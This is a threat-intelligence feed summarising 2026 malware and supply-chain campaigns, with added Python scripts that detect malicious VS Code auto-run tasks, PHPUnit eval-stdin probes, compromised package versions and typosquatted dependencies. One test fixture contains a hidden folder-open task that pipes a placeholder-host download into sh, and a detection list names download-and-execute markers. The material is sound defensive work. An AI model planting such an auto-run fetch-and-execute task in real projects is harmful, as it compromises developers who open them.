LATEST THREAT INTELLIGENCE.
Void Dokkaebi Uses Fake Job Interview Lure to Spread Malware via Code Repositories
Description: Void Dokkaebi, also known as Famous Chollima, has evolved its operations into a self-propagating supply chain threat targeting software developers. The North Korea-aligned group uses fabricated job interviews to lure developers into cloning malicious repositories. Once compromised, the victim's machine becomes an infection vector through two mechanisms: malicious VS Code task configurations that execute automatically when workspaces are opened, and active injection of obfuscated JavaScript into source code files with Git history tampering to conceal modifications. This creates a worm-like propagation chain where each compromised developer seeds new repositories with infection vectors. Analysis in March 2026 identified over 750 infected repositories, with contamination reaching organizations including DataStax and Neutralinojs. The campaign delivers payloads via blockchain infrastructure including Tron, Aptos, and Binance Smart Chain, deploying variants of DEV#POPPER RAT and other tools to steal cryptocurre...
Created at: 2026-04-21T12:09:43.074000
Updated at: 2026-05-21T12:05:32.403000
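The auto-run mechanism above is VS Code's tasks.json "runOptions.runOn": "folderOpen" setting, which starts a task as soon as the folder is opened (VS Code gates this behind the "Allow Automatic Tasks" prompt, so the lure also depends on the developer trusting the workspace). The scanner below is an added example, not code from the report or the group's tooling: it parses a constructed tasks.json, pulls out every folder-open task, and rates it by whether it hides its terminal and whether its command line contains download-or-eval markers. The sample command is a harmless stand-in, not a real payload.

```python
from __future__ import annotations

import json
from typing import Any

# Constructed sample of a .vscode/tasks.json shipped inside a cloned repository.
# The auto-run trigger is runOptions.runOn = "folderOpen"; VS Code starts such
# tasks when the folder is opened, once automatic tasks are allowed for it.
# The command below is a harmless stand-in, not a real payload (assumption).
SAMPLE_TASKS_JSON = r"""
{
  "version": "2.0.0",
  "tasks": [
    {
      "label": "build",
      "type": "shell",
      "command": "npm run build",
      "group": "build"
    },
    {
      "label": "prepare-env",
      "type": "shell",
      "command": "node",
      "args": ["-e", "require('child_process').exec('curl -s https://example.invalid/s | sh')"],
      "presentation": {"reveal": "never", "echo": false},
      "runOptions": {"runOn": "folderOpen"}
    }
  ]
}
"""

# Substrings that, in a task that runs by itself, suggest it fetches or
# evaluates code. Tuned for this example; extend for your environment.
SUSPICIOUS_MARKERS = (
    "curl", "wget", "Invoke-WebRequest", "iwr ", "child_process",
    "eval", "base64", "powershell", "| sh", "| bash", "node -e",
)


def _command_line(task: dict[str, Any]) -> str:
    """Flatten 'command' plus 'args' (plain strings or VS Code's quoted-argument
    objects of the form {"value": ..., "quoting": ...}) into one string."""
    parts = [str(task.get("command", ""))]
    for arg in task.get("args", []):
        parts.append(arg["value"] if isinstance(arg, dict) else str(arg))
    return " ".join(parts)


def find_auto_run_tasks(tasks_json: str) -> list[dict[str, Any]]:
    """Return every task VS Code would start on folder open, with a risk rating.

    Real tasks.json files may contain comments (JSONC); strip those before
    calling this if you point it at a repository checkout.
    """
    doc = json.loads(tasks_json)
    findings = []
    for task in doc.get("tasks", []):
        if (task.get("runOptions") or {}).get("runOn") != "folderOpen":
            continue
        cmd = _command_line(task)
        hidden = (task.get("presentation") or {}).get("reveal") == "never"
        markers = [m for m in SUSPICIOUS_MARKERS if m in cmd]
        findings.append({
            "label": task.get("label"),
            "command": cmd,
            "hidden": hidden,          # terminal never shown: classic for stealth
            "markers": markers,
            "risk": "high" if (markers or hidden) else "review",
        })
    return findings


if __name__ == "__main__":
    for f in find_auto_run_tasks(SAMPLE_TASKS_JSON):
        print(f"[{f['risk']}] {f['label']}: {f['command']!r} hidden={f['hidden']} markers={f['markers']}")
```

Run it over every .vscode/tasks.json in a freshly cloned repository before opening the folder in VS Code; a folder-open task that launches a shell and hides its terminal deserves a manual read even when no marker string matches. The Git history tampering described above is a separate check (compare the local log against the remote's reflog or a known-good clone) that this script does not attempt.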
macOS ClickFix Campaign: AppleScript Stealers & New Terminal Protections
Description: A sophisticated ClickFix campaign targets both Windows and macOS users through fake CAPTCHA pages that trick victims into executing malicious commands. The macOS variant deploys an AppleScript-based infostealer that harvests sensitive data including keychain databases, credentials, and session cookies from 12 browsers, over 200 browser extensions, and 16 cryptocurrency wallets. The malware employs a persistent, non-closable dialog box mimicking legitimate system prompts to force victims into providing their system password. Stolen session cookies enable attackers to bypass multi-factor authentication by hijacking active sessions. The campaign uses client-side JavaScript to filter victims by user-agent, directing desktop users to OS-specific payloads while ignoring mobile devices. Latest macOS updates include native terminal security warnings designed to alert users against pasting potentially malicious commands.
Created at: 2026-04-21T02:05:08.869000
Updated at: 2026-05-21T09:40:07.961000
Popular Go Decimal Library Targeted by Long-Running Typosquat with DNS Backdoor
Description: A long-running typosquatting campaign impersonated the widely used shopspring/decimal Go library by publishing github.com/shopsprint/decimal, differing by a single character. Active since November 2017, the package remained benign through seven releases until being weaponized in August 2023 with version v1.3.3. This version introduced a malicious init() function that executes automatically on import, establishing a DNS TXT record-based command and control channel to dnslog-cdn-images.freemyip.com. The backdoor polls every five minutes and executes arbitrary commands returned via TXT records. Although the GitHub repository and owner account have been deleted, the malicious module remains permanently cached and accessible through Go's module proxy system, continuing to pose a supply chain risk to developers who mistype the package name.
Created at: 2026-05-20T03:16:26.858000
Updated at: 2026-05-21T00:33:17.577000
Inside Banana RAT: From Build Server to Banking Fraud
Description: An MDR investigation successfully mapped the complete operational infrastructure of Banana RAT, a Brazilian banking trojan operated by threat cluster SHADOW-WATER-063. The investigation uncovered both server-side and client-side components, revealing a sophisticated FastAPI-based polymorphic payload generation system that produces hash-unique builds to evade detection. The malware employs layered obfuscation, AES-wrapped payloads, and fileless PowerShell execution. Once deployed, it enables operator-driven fraud through remote input control, keylogging, screen streaming, bank-branded overlays, and Pix QR code interception specifically targeting Brazilian financial institutions. The tooling exclusively targets 16 Brazilian banks and crypto exchanges, with all operator artifacts written in Brazilian Portuguese, indicating a financially motivated actor operating within the Tetrade banking trojan ecosystem.
Created at: 2026-05-19T22:26:55.839000
Updated at: 2026-05-21T00:30:44.319000
Latest PyPI Compromise
Description: A supply chain attack targeting the Microsoft DurableTask Python client compromised versions 1.4.1, 1.4.2, and 1.4.3 on PyPI. The threat actor gained access through a compromised GitHub account previously linked to attacks, using stolen credentials to dump GitHub secrets containing PyPI tokens. The evolved payload targets Linux systems, stealing credentials from AWS, Azure, GCP, Kubernetes, Vault, and password managers such as Bitwarden and 1Password. It propagates via AWS SSM and Kubernetes lateral movement, limited to 5 targets per infected host. The payload scrapes shell history, brute-forces password managers, and establishes persistence through infection markers. Compromised packages were quarantined following analysis.
Created at: 2026-05-19T22:26:56.337000
Updated at: 2026-05-21T00:26:24.796000
Exposing Fox Tempest: A malware-signing service operation
Description: Fox Tempest is a financially motivated threat actor operating a malware-signing-as-a-service (MSaaS) business used by cybercriminals to distribute malicious code, including ransomware. The actor abuses Microsoft Artifact Signing to generate fraudulent code-signing certificates, allowing malware to evade security controls. Fox Tempest created over a thousand certificates and established hundreds of Azure tenants to support operations. Microsoft revoked over one thousand certificates and disrupted the service in May 2026 through the Digital Crimes Unit. The operation enabled ransomware deployment including Rhysida by threat actors such as Vanilla Tempest, and distributed malware families including Oyster, Lumma Stealer, and Vidar. The MSaaS was available through signspace[.]cloud, charging between USD 5,000 and 9,000 per service. Attacks impacted healthcare, education, government, and financial services sectors globally.
Created at: 2026-05-19T17:52:41.390000
Updated at: 2026-05-21T00:24:05.220000
Nine-Year-Old PHP Vulnerability Keeps Swinging As One of the Most Targeted Vulnerabilities
Description: CVE-2017-9841, a remote code execution vulnerability in PHPUnit's eval-stdin.php file, remains highly exploited nearly a decade after disclosure. Analysis reveals over 80,000 exploitation attempts detected in 30 days, with 36,500 hits in the last 10 days alone. The vulnerability affects PHPUnit versions prior to 4.8.28 and 5.x before 5.6.3; the script passes the raw POST body to eval(), so an unauthenticated attacker who can reach it executes arbitrary PHP. Mass-scanning infrastructure targets dozens of framework-specific paths across Laravel, Drupal, Yii, and WordPress installations. Primary attack sources include compromised infrastructure in the UK and US, delivering webshells and botnet payloads. Multiple botnets including RondoDox, Kinsing, KashmirBlack, Sysrv, and Androxgh0st actively exploit this vulnerability. The persistent exploitation stems from developers failing to exclude development dependencies in production environments and leaving vendor/ directories reachable under the web root.
Created at: 2026-05-19T17:52:42.274000
Updated at: 2026-05-21T00:19:43.890000
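Because the scanners try the same file name under many framework prefixes, the cheapest detection is to match the path suffix rather than any one full path. The script below is an added example, not part of the article: it parses constructed combined-format access log lines (documentation IP ranges, an invented plugin directory), counts eval-stdin.php probes per source, and separates mere scans from a POST that got a 2xx, which means the file was present and executed the request body.

```python
import re
from collections import Counter, defaultdict

# Constructed access log lines in combined log format. IPs are from the
# documentation ranges and the plugin directory is invented (assumptions).
SAMPLE_LOG = """\
198.51.100.7 - - [19/May/2026:10:01:02 +0000] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 196 "-" "Mozilla/5.0"
198.51.100.7 - - [19/May/2026:10:01:03 +0000] "POST /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 196 "-" "Mozilla/5.0"
198.51.100.7 - - [19/May/2026:10:01:04 +0000] "POST /wp-content/plugins/example-plugin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 200 12 "-" "Mozilla/5.0"
203.0.113.9 - - [19/May/2026:10:05:00 +0000] "GET /index.php HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.9 - - [19/May/2026:10:05:09 +0000] "GET /sites/default/files/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 403 0 "-" "python-requests/2.31"
"""

# Combined log format: ip ident user [time] "METHOD path PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)
# Match on the suffix so every framework prefix (Laravel, Drupal, Yii,
# WordPress plugin dirs, ...) that the scanner tries is caught.
EVAL_STDIN_RE = re.compile(r"/phpunit/src/Util/PHP/eval-stdin\.php$", re.IGNORECASE)


def parse_line(line):
    """Return the named fields of one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def analyse(log_text):
    """Summarise CVE-2017-9841 probing: attempts per source IP, the distinct
    paths each source tried, and POSTs that were answered 2xx (likely hits)."""
    per_ip = Counter()
    paths = defaultdict(set)
    likely_hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if not rec or not EVAL_STDIN_RE.search(rec["path"]):
            continue
        per_ip[rec["ip"]] += 1
        paths[rec["ip"]].add(rec["path"])
        # The exploit is a POST whose body is eval'd; a 2xx on a POST means the
        # file was served, so treat it as a probable compromise, not a scan.
        if rec["method"] == "POST" and rec["status"].startswith("2"):
            likely_hits.append((rec["ip"], rec["path"]))
    return {
        "attempts_by_ip": dict(per_ip),
        "paths_by_ip": {ip: sorted(p) for ip, p in paths.items()},
        "likely_hits": likely_hits,
    }


if __name__ == "__main__":
    summary = analyse(SAMPLE_LOG)
    for ip, n in sorted(summary["attempts_by_ip"].items(), key=lambda kv: -kv[1]):
        print(f"{ip}: {n} probe(s) across {len(summary['paths_by_ip'][ip])} path(s)")
    for ip, path in summary["likely_hits"]:
        print(f"LIKELY HIT from {ip}: {path}")
```

Any row in likely_hits means a production tree shipped development dependencies and exposed them; the fix is to install with composer install --no-dev and to deny HTTP access to vendor/ at the web server (for nginx, a location block for ^/vendor/ that returns 403), which turns the remaining probes into harmless 4xx noise.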
Nightmare-Eclipse Tooling Seen in Real-World Intrusion
Description: Activity involving BlueHammer, RedSun, and UnDefend tooling from the Nightmare-Eclipse proof-of-concept repository was observed during a live intrusion investigation. The malicious binaries were staged in user-writable directories including Pictures and Downloads folders, with execution attempts failing despite hands-on-keyboard reconnaissance activities. The threat actor demonstrated unfamiliarity with the tools, misspelling command parameters and attempting non-functional flags. Initial access was traced to compromised FortiGate SSL VPN credentials, with connections originating from Russia, Singapore, and Switzerland. A Go-based tunneling agent dubbed BeigeBurrow was deployed for persistent access, beaconing to attacker infrastructure over port 443 using HashiCorp's yamux library for multiplexed reverse tunneling capabilities.
Created at: 2026-04-20T20:28:22.703000
Updated at: 2026-05-20T20:28:03.316000
Active Supply Chain Attack Compromises Packages on npm
Description: An active npm supply chain attack has compromised packages in the @antv ecosystem, affecting the maintainer account 'atool'. The attack is part of the Mini Shai-Hulud campaign, involving 639 compromised package versions across 323 unique packages. Notable affected packages include echarts-for-react with 1.1 million weekly downloads, and widely-used @antv packages for data visualization. The malware uses obfuscated install-time payloads that harvest developer credentials, GitHub tokens, npm tokens, AWS credentials, and other secrets from development and CI/CD environments. Stolen data is encrypted with AES-256-GCM and exfiltrated to a command-and-control server, with GitHub repositories used as fallback channels. The malware contains worm-like functionality to republish compromised packages and propagate through the npm ecosystem.
Created at: 2026-05-19T08:11:20.341000
Updated at: 2026-05-19T17:46:10.861000
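Both this npm entry and the PyPI DurableTask entry above reduce, for a defender, to the same question: does any lockfile in the estate pin a version that is now known bad, and does any npm dependency run an install-time script at all? The scanner below is an added example, not tooling from either advisory. The durabletask versions are the three named above; the echarts-for-react version it flags is a placeholder, because the summary names the package but not the pushed versions, and the lockfile and requirements file are constructed. It reads package-lock.json (lockfileVersion 2 or 3, which records hasInstallScript per package) and a requirements.txt with exact pins.

```python
from __future__ import annotations

import json
import re

# Known-bad versions. durabletask entries are those named in the PyPI advisory;
# the echarts-for-react version is a placeholder (assumption), since the npm
# summary does not list which versions were pushed.
KNOWN_BAD = {
    "pypi": {"durabletask": {"1.4.1", "1.4.2", "1.4.3"}},
    "npm": {"echarts-for-react": {"9.9.9"}},
}

# Constructed inputs (assumptions): a lockfileVersion 3 package-lock.json and a
# requirements.txt with exact pins, extras and an environment marker.
SAMPLE_LOCK = json.dumps({
    "name": "app", "lockfileVersion": 3,
    "packages": {
        "": {"name": "app", "dependencies": {"echarts-for-react": "9.9.9"}},
        "node_modules/echarts-for-react": {"version": "9.9.9", "hasInstallScript": True},
        "node_modules/@scope/some-lib": {"version": "2.0.0"},
        "node_modules/some-lib/node_modules/nested-lib": {"version": "0.3.1"},
    },
})
SAMPLE_REQ = """\
# pinned application dependencies
somepkg==1.0.0
DurableTask==1.4.2
other-pkg[extra]==3.2.1 ; python_version >= "3.8"
-r base.txt
"""

REQ_RE = re.compile(
    r"^\s*(?P<name>[A-Za-z0-9][A-Za-z0-9._-]*)(?:\[[^\]]*\])?\s*==\s*(?P<ver>[^\s;#]+)"
)


def normalize_pypi(name: str) -> str:
    """PEP 503 name normalisation: lower-case, runs of . _ - become '-'."""
    return re.sub(r"[-_.]+", "-", name).lower()


def scan_requirements(text: str) -> list[dict]:
    """Flag exact pins of known-bad PyPI versions. Unpinned lines are not
    judged here: they are a finding of their own for pip install --require-hashes."""
    findings = []
    for line in text.splitlines():
        m = REQ_RE.match(line)
        if not m:
            continue
        name, ver = normalize_pypi(m["name"]), m["ver"]
        if ver in KNOWN_BAD["pypi"].get(name, set()):
            findings.append({"ecosystem": "pypi", "name": name, "version": ver,
                             "reason": "known-bad version"})
    return findings


def scan_package_lock(text: str) -> list[dict]:
    """Flag known-bad npm versions and every package with an install script."""
    lock = json.loads(text)
    findings = []
    # lockfileVersion 2/3 keys "packages" by node_modules path; "" is the root.
    for path, meta in lock.get("packages", {}).items():
        if not path:
            continue
        name = path.split("node_modules/")[-1]      # keeps @scope/name, drops nesting
        ver = meta.get("version", "")
        if ver in KNOWN_BAD["npm"].get(name, set()):
            findings.append({"ecosystem": "npm", "name": name, "version": ver,
                             "reason": "known-bad version"})
        if meta.get("hasInstallScript"):
            # preinstall/install/postinstall hooks are where the stealer runs;
            # review each one or install with --ignore-scripts.
            findings.append({"ecosystem": "npm", "name": name, "version": ver,
                             "reason": "install script present"})
    return findings


if __name__ == "__main__":
    for f in scan_requirements(SAMPLE_REQ) + scan_package_lock(SAMPLE_LOCK):
        print(f"{f['ecosystem']}: {f['name']}@{f['version']}: {f['reason']}")
```

A hit on "install script present" is not proof of compromise, but it is the complete list of packages that can execute code during npm ci; running CI with npm ci --ignore-scripts and pip install --require-hashes removes the install-time execution path and the silent version drift that both campaigns depend on.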
Copycat hits another npm package
Description: A Shai-Hulud copycat worm has infected the npm package chalk-tempalte, appearing just five days after the original worm was open-sourced by its creators. The same threat actor also published three additional malicious npm packages containing infostealer code: @deadcode09284814/axios-util, axois-utils, and color-style-utils. These packages collectively received 2,678 weekly downloads and contain various malicious capabilities including credential theft, cryptocurrency wallet exfiltration, cloud configuration harvesting, and DDoS botnet functionality. The malware exfiltrates stolen data to remote command-and-control servers and uploads credentials to GitHub repositories. Researchers indicate the attacker operates from a home computer or local server farm and appears financially motivated, targeting victims' cryptocurrency assets while potentially offering DDoS-as-a-service capabilities.
Created at: 2026-05-18T22:26:37.400000
Updated at: 2026-05-19T17:39:11.086000
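The shopsprint/decimal entry above (one substituted character) and this entry (chalk-tempalte, axois-utils: two adjacent letters swapped) are both lookalike names, so one distance check covers both ecosystems. The script below is an added example, not from either report: it implements optimal string alignment distance (Levenshtein plus adjacent transposition, so a swap costs 1, not 2), pulls dependency names from a constructed go.mod and package.json, and flags any name within distance 1 of an allowlist. The allowlist entries are illustrative assumptions standing in for a team's approved-dependency catalogue; for scoped npm names it also compares the part after the scope, since a copy published under a throwaway scope keeps the lookalike name.

```python
from __future__ import annotations

import json

# Illustrative allowlist (assumption): the dependencies a team actually intends
# to use. In practice derive this from your internal catalogue.
ALLOWLIST = {
    "go": {"github.com/shopspring/decimal"},
    "npm": {"chalk-template", "axios-utils", "axios"},
}

# Constructed inputs (assumptions).
SAMPLE_GO_MOD = """\
module example.com/app

go 1.22

require (
\tgithub.com/shopsprint/decimal v1.3.3
\texample.com/other v0.1.0 // indirect
)
"""
SAMPLE_PACKAGE_JSON = json.dumps({
    "dependencies": {
        "chalk-tempalte": "^1.0.0",
        "axois-utils": "1.0.0",
        "@deadcode09284814/axios-util": "1.0.0",
        "color-style-utils": "1.0.0",
    },
    "devDependencies": {"left-pad": "1.3.0"},
})


def osa_distance(a: str, b: str) -> int:
    """Optimal string alignment distance: insert, delete, substitute, or swap
    two adjacent characters, each at cost 1."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)   # transposition
    return d[len(a)][len(b)]


def go_mod_requires(text: str) -> list[str]:
    """Module paths from single-line 'require x vN' and 'require ( ... )' blocks."""
    paths, in_block = [], False
    for raw in text.splitlines():
        line = raw.split("//")[0].strip()          # drop '// indirect' comments
        if not line:
            continue
        if line == "require (":
            in_block = True
            continue
        if in_block and line == ")":
            in_block = False
            continue
        parts = line.split()
        if line.startswith("require ") and len(parts) == 3:
            paths.append(parts[1])
        elif in_block and len(parts) == 2 and parts[1].startswith("v"):
            paths.append(parts[0])
    return paths


def package_json_deps(text: str) -> list[str]:
    pkg = json.loads(text)
    return list(pkg.get("dependencies", {})) + list(pkg.get("devDependencies", {}))


def find_typosquats(ecosystem: str, names: list[str], max_distance: int = 1) -> list[dict]:
    """Names not on the allowlist that sit within max_distance of an allowed name."""
    allow = ALLOWLIST[ecosystem]
    hits = []
    for name in names:
        if name in allow:
            continue
        candidates = {name}
        if ecosystem == "npm" and name.startswith("@") and "/" in name:
            candidates.add(name.split("/", 1)[1])   # compare the unscoped part too
        for cand in candidates:
            for legit in allow:
                dist = osa_distance(cand, legit)
                if dist <= max_distance:
                    hits.append({"name": name, "looks_like": legit, "distance": dist})
    return hits


if __name__ == "__main__":
    for h in find_typosquats("go", go_mod_requires(SAMPLE_GO_MOD)):
        print(f"go: {h['name']} looks like {h['looks_like']} (distance {h['distance']})")
    for h in find_typosquats("npm", package_json_deps(SAMPLE_PACKAGE_JSON)):
        print(f"npm: {h['name']} looks like {h['looks_like']} (distance {h['distance']})")
```

Distance 1 against an allowlist is deliberately strict; widening it catches more squats but starts matching legitimate sibling packages, so treat hits as a review queue rather than a block. For Go specifically, the deleted shopsprint repository does not help you: the module proxy still serves the cached v1.3.3, so the check has to run on go.mod and go.sum, not on whether the GitHub page resolves.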
